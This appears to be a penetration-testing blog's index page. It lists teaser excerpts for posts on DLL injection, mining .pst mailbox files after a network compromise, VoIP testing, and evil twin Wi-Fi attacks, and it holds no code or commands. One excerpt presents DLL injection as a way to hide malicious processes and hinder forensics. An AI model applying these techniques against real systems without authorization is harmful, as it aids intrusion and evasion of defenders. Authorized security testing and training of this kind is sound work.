The goal of DLL injection is to load a code into another running process’ address space. So how exactly do we go about accomplishing that? It turns out there are a couple of ways to do so in Windows. We are first going to examine "SetWindowsHookEx," a method for creating hooks in Windows. If by the end of this post you are hungry for more, check out the references at the ... READ MORE
Offense
Pillaging .pst Files
This post originally proposed using the open-source java program Xena and its included plugin for converting .pst files into a searchable format. It still references Xena, but has been updated to reflect a simpler approach. On a recent engagement we were able to quickly compromise a client’s network thanks to NetBIOS spoofing and easily cracked passwords. Of course, the ... READ MORE
DLL Injection Part 0: Understanding DLL Usage
As a result of my foray into static malware analysis, I decided I needed a better understanding of DLL injection. DLL injection allows us to run code in another process. This is useful because it allows us to hide malicious processes in other, benign processes. It also means not having to save anything to the disk, making detection and forensics that much more difficult. This ... READ MORE
VoIP Penetration Testing: Introduction
I've had a number of recent opportunities to conduct VoIP-focused penetration tests. Prior to my first, I noticed that the number of tutorials, blogs and training write ups are pretty scarce. So, I figured it might be helpful to have all of it in one place. In this short blog series, I'll cover the goals, methodology, and tools needed to conduct a successful VoIP penetration ... READ MORE
Evil Twin Attack Using hostapd-wpe
The Evil Twin Attack has been around for some time. In the past, when we've run across WPA/2 Enterprise Wireless networks while on assessments, we'd break out a separate router and sit in a parking lot or lunch room waiting for victims to pass. The attack was simple, but the setup was overly complicated and left us tied to a power outlet. Fortunately, all that is in the past. A ... READ MORE
Understanding Radio Frequency Theory
I did a short series on attacking Wi-Fi for my personal blog last year, but I did not cover Enterprise Wireless. A few interesting tools have been released in the time that has passed, so I'm going to steal some of my own words as a short lead into a new post on conducting attacks against WPA/2-Enterprise wireless networks. The Spectrum Electromagnetic energy is the basis on ... READ MORE
The Importance of Understanding Your Tools
There are many qualities and skills necessary to be an effective penetration tester. Experience with a programming language or two is right at the top of that list. I don’t mean that you need to have a development background. Successful attackers should, however, be able to look at the tools and exploits they use and understand they actually work. This exact issue came up on a ... READ MORE